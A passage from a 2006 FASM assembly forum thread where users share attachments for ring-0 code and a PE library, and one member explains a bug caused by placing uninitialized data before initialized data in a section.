                Unknown  rw 1
                ModuleNameOffset rw 1
                ImageName rb MAXIMUM_FILENAME_LENGTH
        ends    
Post 06 Mar 2006, 19:26
View user's profile Send private message Reply with quote
okasvi



Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi 06 Mar 2006, 22:42
k, here it is 4kb in size, somewhat ugly src but i was just converting it to fasm without thinking what it looks like...


Description: notice two different parts of code to be executed in r0
Download
Filename: r0_fasm.asm
Filesize: 13.86 KB
Downloaded: 285 Time(s)


_________________
When We Ride On Our Enemies
support reverse smileys |:
Post 06 Mar 2006, 22:42
View user's profile Send private message MSN Messenger Reply with quote
shism2



Joined: 14 Sep 2005
Posts: 248
shism2 06 Mar 2006, 22:49
asdfasdf


Description:
Download
Filename: PeLibrary-0.3c.zip
Filesize: 105.07 KB
Downloaded: 304 Time(s)

Post 06 Mar 2006, 22:49
View user's profile Send private message Reply with quote
LocoDelAssembly
Your code has a bug


Joined: 06 May 2005
Posts: 4624
Location: Argentina
LocoDelAssembly 07 Mar 2006, 04:51
shism2, you still get the same problem because you created a new section but with the uninitialized data placed before the initialized data. You can fix it adding a new section for uninitialized data (like okasvi), or:
LocoDelAssembly wrote:
if you put the data on a separated section then you don't need to put uninitialized data at the end of the source but at the end of the section and the section can be placed anywhere.
Post 07 Mar 2006, 04:51
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page Previous  1, 2

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.